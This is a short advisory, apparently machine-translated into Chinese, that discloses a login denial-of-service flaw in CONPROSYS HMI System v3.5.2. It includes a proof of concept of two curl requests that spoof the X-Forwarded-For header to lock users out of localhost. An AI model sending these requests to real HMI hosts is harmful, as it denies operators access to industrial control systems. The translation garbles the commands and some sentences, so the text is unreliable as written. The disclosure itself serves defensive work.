该系统登录DoS CONPROSYS人机界面

一个拒绝服务漏洞存在于该系统(CHS) v3.5.2 CONPROSYS人机界面。未经过身份验证的远程攻击者可以利用它来防止合法用户登录attacker-specified IP地址的时间如果时区中配置PHP和PostgreSQL是不同的。攻击者可以重复登录DoS攻击导致在较长一段时间。


概念验证
防止登录localhost。
设置日期。在php时区”到“UTC”。ini和PostgreSQL的“美国/ New_York”,以确保不同的时区。
一个单独的主机上运行:
# curl - h”X-Forwarded-For::: 1 - d ' uid = admin&pwd = aaa ' ' http:// < chs-host > / php /登录。php ? cid = con&pid = admin&type =管理,user&nname = 1 lang = en '
# curl - h”X-Forwarded-For: 127.0.0.1”- d ' uid = admin&pwd = aaa ' ' http:// < chs-host > / php /登录。php ? cid = con&pid = admin&type =管理,user&nname = 1 lang = en '

在CHS主机上使用一个web浏览器,尝试登录http://localhost/ProjectID管理的有效身份证件。有效用户用正确的凭证不应该能够登录的主机。